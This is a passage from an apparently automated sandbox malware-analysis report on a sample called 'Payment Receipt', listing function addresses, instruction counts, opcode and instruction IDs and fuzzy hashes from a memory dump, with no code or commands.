                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6da4bc71e599409fd822b15552767d96e12d1c48c356c2880e43d15eb07304f8
                                                                      • Instruction ID: 0e677552dfbd305442f409deeda26954a7a426f68f15db30a2e1852e1fb88b91
                                                                      • Opcode Fuzzy Hash: 6da4bc71e599409fd822b15552767d96e12d1c48c356c2880e43d15eb07304f8
                                                                      • Instruction Fuzzy Hash: 2AF027264157818BCF325F7CEC503D1BB5DA741018F0920A9E8A057305C6749493C364
                                                                      Function 015DC5ED Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b599122bedc1f2872536f19785da280bea228c25e71cb8ae7e840db4c019bc65
                                                                      • Instruction ID: 527ce56c4650b966d3525d56869474d79ef88e4bb6ff9b0fae14482afc6c249e
                                                                      • Opcode Fuzzy Hash: b599122bedc1f2872536f19785da280bea228c25e71cb8ae7e840db4c019bc65
                                                                      • Instruction Fuzzy Hash: 8AF0E2715226519FE732971CC188B59BBD4BB417A0F1C982DE5068F512C660E880CB50
                                                                      Function 015E2619 Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                      • Instruction ID: 387fee6d3651f5c8d8df3e4e33502d458b369a356112caba64c01883d760c078
                                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                      • Instruction Fuzzy Hash: 5EE0D8727406022BE7169F598CC4F477BAEFFD2B10F04447DB5045F252CAE2DD0986A4
                                                                      Function 01636030 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                      • Instruction ID: 5bbe51e42b2efb82ca4bd4897031bf2e0bcfce20ea788c3ca40358ff7a7aa543
                                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                      • Instruction Fuzzy Hash: 9BF0A072100204AFE3218F09DE81F52F7F8EB85364F01C025E6089B260D37AEC40CBA0
                                                                      Function 015A0710 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                      • Instruction ID: dc4bccab5da73230d06ede4a9e3ff6f5b24dd7bf4b4b60697ecd7314e4d07702
                                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                      • Instruction Fuzzy Hash: 0FF0E53A2043459FDB16CF19C440A997FE4FB41390F010458FD428F351D731E981CB55
                                                                      Function 015D49D0 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                      • Instruction ID: f4f245272fa04d4b991e0ac4b7d3d2fc3e89e64e9259f03f330188e7b59bb70d
                                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                      • Instruction Fuzzy Hash: B1E0D832254146AFD3311A5D8800B7A77E7FBD07A0F160429E2408F954DBF0DC80C7D9
                                                                      Function 01674164 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99d484edcb89bd38cff212120b63e9dd5265cab169809c058418c48f75803dfc
                                                                      • Instruction ID: daeb0e8c0be8b7992ae0ed194e8e3819e42bf8648ffc7745cd34167864528a13
                                                                      • Opcode Fuzzy Hash: 99d484edcb89bd38cff212120b63e9dd5265cab169809c058418c48f75803dfc
                                                                      • Instruction Fuzzy Hash: C7F06531A259D14FE772E72CF988F6577E4AF50631F1A0954D4058BA12CB24DC40C650
                                                                      Function 0164678E Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                      • Instruction ID: bed2a4b6fc0db3993016432ad372967f617dbfae5ce71cfe5124f10fc715c372
                                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                      • Instruction Fuzzy Hash: 7CE04872640215BBDB219759CD05F9A7EACEB94E90F154055F601DB194E570DE00D690
                                                                      Function 016708C0 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                      • Instruction ID: 627b63faa14a3ea0690e6935693bb5631524d4f79a68cab84ecc8e1537376d0a
                                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                      • Instruction Fuzzy Hash: 85E09B316403508BCF258A1DC940A53B7EDDF96760F16806EE90547712C331F843CAE0
                                                                      Function 015A25E0 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8a00c165e6cec3a345d52dd301938dcf61c8cc715b11c2e404de18a9be5f6ffe
                                                                      • Instruction ID: 1adee32ff5fcff8088c08e9920a50d57f56ebfcaf06c5cec72ee03cd6d52ba54
                                                                      • Opcode Fuzzy Hash: 8a00c165e6cec3a345d52dd301938dcf61c8cc715b11c2e404de18a9be5f6ffe
                                                                      • Instruction Fuzzy Hash: C5E092321006559BC721BF69DD01F8A779EFFA0360F014515B1555B190CB70A810C7C4
                                                                      Function 0165A456 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                      • Instruction ID: 26104fe0357e83f79c6fe69358b25ef34495389d64cb7d9d9eef86e4ce3f8eb6
                                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                      • Instruction Fuzzy Hash: 63E09231011613DFE7766FAACC4CB527EE4FF90711F148D2CA0961A6B0C7B598C1CA40
                                                                      Function 01624000 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                      • Instruction ID: 3ec668be6c2d0f4b85a59e9435e911feff4f6d2588d34c7dc97ee1e53edd43a2
                                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                      • Instruction Fuzzy Hash: 07E0C2343007158FE715CF1AC440B627BB6BFD5A10F28C068E9488F305EB36E882CB40
                                                                      Function 0159823B Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                      • Instruction ID: a3569a6c7badadfba550a62b703d3b2bcd551490683049ac12d5014ec98dff2f
                                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                      • Instruction Fuzzy Hash: CDE0C232840A1AEFDF322F25DC44F5576E9FF95B10F204C6EE0811E0A887B4AC81CB45
                                                                      Function 015A2050 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd30df8a28bced1d5757bbe9f685f3d0b5ec2ac1d75d2e25c94fc8067e7adbe4
                                                                      • Instruction ID: c3c67ee4a6b9ce638fd8780c2715232bd3d99436e6e6d8576064eaaf60939b7b
                                                                      • Opcode Fuzzy Hash: dd30df8a28bced1d5757bbe9f685f3d0b5ec2ac1d75d2e25c94fc8067e7adbe4
                                                                      • Instruction Fuzzy Hash: F1E08C321405616BC311FE9DDD51E8A739EFFE4260F440121B1509B294CA60AC10C794
                                                                      Function 015D8A90 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                      • Instruction ID: 1e583e4c7ffdf3521f2bf283bd3ef9ea473712fd5b49f6547371adb2b4f194d4
                                                                      • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                      • Instruction Fuzzy Hash: B5E04F33111A1487C728DE18D511A6677A4FB45730B09462AA6138B780C574E544C795
                                                                      Function 015DE59C Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                      • Instruction ID: e0b898caad1ad8740e96c2c1e4d8cc11aa7c0bb0a99167da086c079e105c4392
                                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                      • Instruction Fuzzy Hash: B8D0A932224620ABD7B2AA1CFC00FC333E8BB88B20F0A0459B008CB154C360AC81CA84
                                                                      Function 0161E908 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                      • Instruction ID: 65ff0947c94f020a1e3823fa4443e9bc7008223dea94312c5c2da8cea0e34421
                                                                      • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                      • Instruction Fuzzy Hash: 27E0EC359506859BDF53DFA9CA40F5EBBB5FB94B40F190454A5086F664C735E900CB40
                                                                      Function 0159A0E3 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                      • Instruction ID: 6e4fe60b9846fc5275d82b59ab7bfd0773838163571151d1e532a4aee4f64bec
                                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                      • Instruction Fuzzy Hash: 67D0223222203193CF285695A800FA76905FFC1A90F0A002C340AAB800C2148C42D2F0
                                                                      Function 015DA830 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                      • Instruction ID: 45de6d1f75cb4a200f6252188b3be26ae342433235455887294b564e73a16b66
                                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                      • Instruction Fuzzy Hash: 31D012371E054DBBCB519FA6DC41F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                                      Function 015DCA24 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 358b9887f143b7aa9af23945905a3f3c61212e097758d035e88777ba64098001
                                                                      • Instruction ID: bbeff8119dc9e53feac32dc251fbb17f9ac6e4cc59a404f624301bd4c4128ac6
                                                                      • Opcode Fuzzy Hash: 358b9887f143b7aa9af23945905a3f3c61212e097758d035e88777ba64098001
                                                                      • Instruction Fuzzy Hash: 27D0A730552102CBDF26CF8CCD10D6E36B8FF20640B44006CE70057524D364FC11C740
                                                                      Function 015B02A0 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                      • Instruction ID: 841c5033d08fa538e7438c1ed48efff6cbb26d30fb15f314d2f468ed78cce8d7
                                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                      • Instruction Fuzzy Hash: E7D0C935212E80CFD62BCB0CC9A4B5A73B4BB44B44F810490F501CBBA2D62CD944CA00
                                                                      Function 015DC700 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                      • Instruction ID: ccf773aaee35b82dc135d919dfc5d1bf9a855c600ed1934fafc284f1c488c9be
                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                      • Instruction Fuzzy Hash: ACC012322A0648AFC752AA99CD41F427BA9FBA8B40F000021F2048B670C631E820EA84
                                                                      Function 015C0310 Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                      • Instruction ID: 4a50a51bdd3ab35f1d9cf96849b95ef5e5e92891abf196b452599efe26cfb64a
                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                      • Instruction Fuzzy Hash: 6ED01236100249EFCB01DF85C890D9A772AFBD8F10F109019FD190B6508A31ED63DA50
                                                                      Function 015A0750 Relevance: .0, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                      • Instruction ID: 8516e0ef21a31bb815dcc39fd2cca30af36bc7baba4d8da1b2345110353981ea
                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                      • Instruction Fuzzy Hash: E6C04879701A428FCF16DF2AD6D4F8977E4FB84780F160890E905DFB22E624E801CA10
                                                                      Function 015E4340 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a01d78f79e5bb9643e21cfa62a4feb286cc97b856b9c5541d4b0664eb1f5b206
                                                                      • Instruction ID: d58513a0ca291f395633aa437d8cea2a056142e0857221d7d7388d6ff84fe879
                                                                      • Opcode Fuzzy Hash: a01d78f79e5bb9643e21cfa62a4feb286cc97b856b9c5541d4b0664eb1f5b206
                                                                      • Instruction Fuzzy Hash: 7A900231605800129540715848845464045F7E1311B59C415E1824954CCB54CA6A5361
                                                                      Function 015E4650 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b9865e7a168abd0434784c21f321c54ea8329961a9571e091f2f16662e60d50
                                                                      • Instruction ID: 0b6a207645f8f9d11ca742a750b07fbd4d2de228218e3dad05f14060a6f8daaf
                                                                      • Opcode Fuzzy Hash: 8b9865e7a168abd0434784c21f321c54ea8329961a9571e091f2f16662e60d50
                                                                      • Instruction Fuzzy Hash: ED900261601500424540715848044066045F7E2311399C519A1954960CC758C9699369
                                                                      Function 015E2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49d0824c6c34bbf2d384dc927bc0f47875b1b7fbc30fefd7c1afaaad60c124d5
                                                                      • Instruction ID: c044945311c9e70a8ec7e7972c3ae08a7142e8f6a4ba88eb482f6e82d02e5fca
                                                                      • Opcode Fuzzy Hash: 49d0824c6c34bbf2d384dc927bc0f47875b1b7fbc30fefd7c1afaaad60c124d5
                                                                      • Instruction Fuzzy Hash: DB90023120140802D5807158440464A0045E7D2311F99C419A1425A54DCB55CB6D77A1
                                                                      Function 015E2BE0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 88798e5ec5b51882c9f9a70f6d7b956685470960b9249be603b81ced63fcf6f5
                                                                      • Instruction ID: debb971c7c879b467167c0ac6ff2ec713f34cc232839c15aeda100315fe52be6
                                                                      • Opcode Fuzzy Hash: 88798e5ec5b51882c9f9a70f6d7b956685470960b9249be603b81ced63fcf6f5
                                                                      • Instruction Fuzzy Hash: 0D90023120544842D54071584404A460055E7D1315F59C415A1464A94DD765CE69B761
                                                                      Function 015E2B80 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f561f297c0d62e335bfa0445fe81aa1f7eea5ff818e17e8153ba2746ea8321d
                                                                      • Instruction ID: 5c41ead594921ec8ee1e66c1fa2aa9d020ebbde83de2d06462f5331aae3623ae
                                                                      • Opcode Fuzzy Hash: 9f561f297c0d62e335bfa0445fe81aa1f7eea5ff818e17e8153ba2746ea8321d
                                                                      • Instruction Fuzzy Hash: 6790023120140802D504715848046860045E7D1311F59C415A7424A55ED7A5C9A57231
                                                                      Function 015E2BA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a50ca8d515f6226e0b799047274c373dbb8ab7b9c0e0fff5684f1a94a847e6f3
                                                                      • Instruction ID: bd1ca904743929f32ae4f581f2e5032fc7693bb0d879b31e0e7b9843d2330574
                                                                      • Opcode Fuzzy Hash: a50ca8d515f6226e0b799047274c373dbb8ab7b9c0e0fff5684f1a94a847e6f3
                                                                      • Instruction Fuzzy Hash: AF90023160540802D550715844147460045E7D1311F59C415A1424A54DC795CB6977A1
                                                                      Function 015E2AD0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af639566ed5ee3594d1ca8ba4fc939ccdb9caf138992645d99642f6accbe2045
                                                                      • Instruction ID: 5fe5ed90c7d822e32005a4f01dff6ab530e006fa2ab38025615d0bd398b5d937
                                                                      • Opcode Fuzzy Hash: af639566ed5ee3594d1ca8ba4fc939ccdb9caf138992645d99642f6accbe2045
                                                                      • Instruction Fuzzy Hash: 77900225211400030505B55807045070086E7D6361359C425F2415950CD761C9755221
                                                                      Function 015E2AF0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c478525b07cbf437296385a9a03ca72110a865f523e49cc98d561ab024dff1c
                                                                      • Instruction ID: dfa289596148c72172eeb2e4fa07ff662a48d986c3543c8c2d1e013a9f9d3c72
